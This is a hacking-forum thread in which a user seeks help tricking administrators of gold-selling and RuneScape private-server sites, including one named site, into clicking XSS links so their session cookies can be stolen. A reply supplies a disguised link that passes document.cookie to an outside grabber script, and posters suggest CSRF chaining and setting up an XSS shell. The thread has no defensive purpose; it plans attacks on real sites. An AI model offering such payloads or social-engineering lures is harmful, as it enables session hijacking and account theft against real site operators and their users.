XSS Social Engineering

[Rakeya]

So... lately I've been scanning for XSS vulnerabilities in websites, and I would like to know what would be the best route to actually getting an admin to fall for the threat. Like, what thread should i make that can attract admins directly into the thread to get their cookies . BTW the websites I am targeting are gold-selling websites and runescape private server websites/forums

 

[Ben Hartley]

[url=http://www.site.com/grabber.php?i=+document.cookie]www.site.com/Security-risk-in-forum.php[/ur]

Depending on what dav methods are used you can combine with crsf and successfully hijack the session easily hell you could even setup xss shell if its persistent xss.

 

[Rakeya]

can you help me up a cookie stealer? I have an xss vulnerability to guy4game.com

 

[Ignite_mybb_import20174]

most websites have patched this so called cookie stealer so gl getting something out of it, but as error mentioned i would suggest setting up an xss shell.

 

[Rakeya]

I've targetted websites that haven't patched this. Underground websites and websites that work into selling gaming items don't spend their time bulking up their security. And also, just because you patch one part of the website with XSS vulnerability, doesn't mean the entire website can't be XSS'd, I've already tested the XSS onmouseover with a command prompt script, but I need to know how to setup a cookie stealer.